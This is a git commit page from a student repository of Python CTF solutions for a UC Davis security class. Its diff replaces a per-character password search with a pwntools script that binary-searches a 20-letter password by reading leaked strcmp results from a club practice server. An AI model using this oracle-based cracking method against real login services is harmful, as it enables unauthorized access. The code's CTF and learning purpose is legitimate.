ucdavis-ecs189m

[RADIOACTIVE] python exploits for uc davis class ecs189m
git clone git://git.figbert.com/ucdavis-ecs189m.git
Log | Files | Refs
commit e0e24040d866dc889eaa3c870d1698e2b8691e90
parent d566d297dfebd290f96b1a3ede24d8b9c629fea7
Author: therealFIGBERT <figbertwelner@gmail.com>
Date:   Thu, 10 Oct 2019 11:22:12 -0700

Replacing contents of third_flag.py with dad_flag.py

Diffstat:

Ddad_flag.py | 29-----------------------------


Mthird_flag.py | 120++++++++++++++++++++++++++++---------------------------------------------------


2 files changed, 43 insertions(+), 106 deletions(-)

diff --git a/dad_flag.py b/dad_flag.py
@@ -1,28 +0,0 @@
-from pwn import *
-
-def str_to_dec(s):
-    num_vals = [(ord(char)-97) for char in s][-1::-1]
-    lst = []
-    for pos, val in enumerate(num_vals): 
-        lst.append(val*(26**pos))
-    return sum(lst)
-
-def dec_to_str(num):
-    st = ""
-    for i in range(19,0,-1):
-        digit = int(num/(26**i))
-        char = chr(digit+97)
-        st += char
-        num -= digit*(26**i)
-    char = chr(int(num)+97)
-    st += char  
-    return st
-
-LO26 = "aaaaaaaaaaaaaaaaaaaa"
-HI26 = "yyyyyyyyyyyyyyyyyyyy"
-LO10 = str_to_dec(LO26)
-HI10 = str_to_dec(HI26)
-MID10 = (LO10 + HI10)/2
-print(dec_to_str(LO10))
-print(dec_to_str(HI10))
-print(dec_to_str(MID10))
-\ No newline at end of file
diff --git a/third_flag.py b/third_flag.py
@@ -1,84 +1,50 @@
-# A CTF exploit by Benjamin Welner
-# for the Davis Cyber Security Club server
-# at twinpeaks.cs.ucdavis.edu:30004
-# 29/09/2019
-#
-# Challenge:
-# I have a password that only has lowercase letters and has length 20.
-# Enter the password to get the flag.
 from pwn import *
-import itertools
 
-def pass_gen(char=None, pos=None, premade=None, first=False):
-    password = ""
-    if first:
-        password = char
-        for _ in range(0,19):
-            password += "a"
-    else:
-        lst = [a for a in premade]
-        lst[pos] = char
-        for item in lst:
-            password += item
-    return password
+def str_to_dec(s):
+    num_vals = [(ord(char)-97) for char in s][-1::-1]
+    lst = []
+    for pos, val in enumerate(num_vals): 
+        lst.append(val*(26**pos))
+    return sum(lst)
 
-def find_middle(lst):
-    middle = float(len(lst))/2
-    return int(middle - .5) if middle % 2 != 0 else int(middle-1)
+def dec_to_str(num):
+    st = ""
+    for i in range(19,0,-1):
+        digit = int(num/(26**i))
+        char = chr(digit+97)
+        st += char
+        num -= digit*(26**i)
+    char = chr(int(num)+97)
+    st += char  
+    return st
 
-master_alphabet = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z"]
-current_mid = find_middle(master_alphabet)
-previous_mid = current_mid
-alphabet = master_alphabet
-passkey = ""
-previous_pass = ""
-response = None
-previous_response = None
 cracked = False
-flipped = False
-start = 0
-
+attempt = 1
+LO26 = "aaaaaaaaaaaaaaaaaaaa"
+HI26 = "zzzzzzzzzzzzzzzzzzzz"
+LO10 = str_to_dec(LO26)
+HI10 = str_to_dec(HI26)
+MID10 = (LO10 + HI10)/2
+MID26 = dec_to_str(MID10)
 conn = remote("twinpeaks.cs.ucdavis.edu", 30004)
 print(conn.recv())
-passkey = pass_gen(first=True, char=alphabet[current_mid])
 while not cracked:
-    while not flipped:
-        conn.sendline(passkey)
-        print("Current letters:\n%s"%alphabet)
-        print("Pass sent as:\n%s"%passkey)
-        previous_response = response if response is not None else None
-        response = conn.recvline_contains(b"strcmp")
-        print("Server response:\n%s"%response)
-        last_response_was_small = True if b" -1 " in response else False
-        if b" -1 " in response:
-            alphabet = alphabet[current_mid:]
-            previous_mid = current_mid
-            current_mid = find_middle(alphabet)
-            previous_pass = passkey
-            passkey = pass_gen(char=alphabet[current_mid], pos=start, premade=passkey)
-            if last_response_was_small:
-                flipped = False
-            else:
-                flipped = True
-        elif b" 1 " in response:
-            alphabet = alphabet[:current_mid]
-            previous_mid = current_mid
-            current_mid = find_middle(alphabet)
-            previous_pass = passkey
-            passkey = pass_gen(char=alphabet[current_mid], pos=start, premade=passkey)
-            if last_response_was_small:
-                flipped = True
-            else:
-                flipped = False
-        else:
-            print("Password cracked as: %s"%passkey)
-            cracked = True
-            conn.interactive()
-    # while len(alphabet) > 1:
-    flipped = False
-    alphabet = master_alphabet
-    current_mid = find_middle(alphabet)
-    if not last_response_was_small:
-        response = previous_response
-        passkey = previous_pass
-    start += 1
-\ No newline at end of file
+    conn.sendline(MID26)
+    print("Attempt {}:\nPass sent as:\n{}\nCurrent low:\n{}\nCurrent high:\n{}\n".format(attempt, MID26, LO26, HI26))
+    attempt += 1
+    response = conn.recvline_contains(b"strcmp")
+    print("Server response:\n{}\n".format(response))
+    if b" -1 " in response:
+        LO26 = MID26
+        LO10 = str_to_dec(LO26)
+        MID10 = (LO10 + HI10)/2
+        MID26 = dec_to_str(MID10)
+    elif b" 1 " in response:
+        HI26 = MID26
+        HI10 = str_to_dec(HI26)
+        MID10 = (LO10 + HI10)/2
+        MID26 = dec_to_str(MID10)
+    else:
+        print("Password cracked as: {}".format(MID26))
+        cracked = True
+        conn.interactive()
+\ No newline at end of file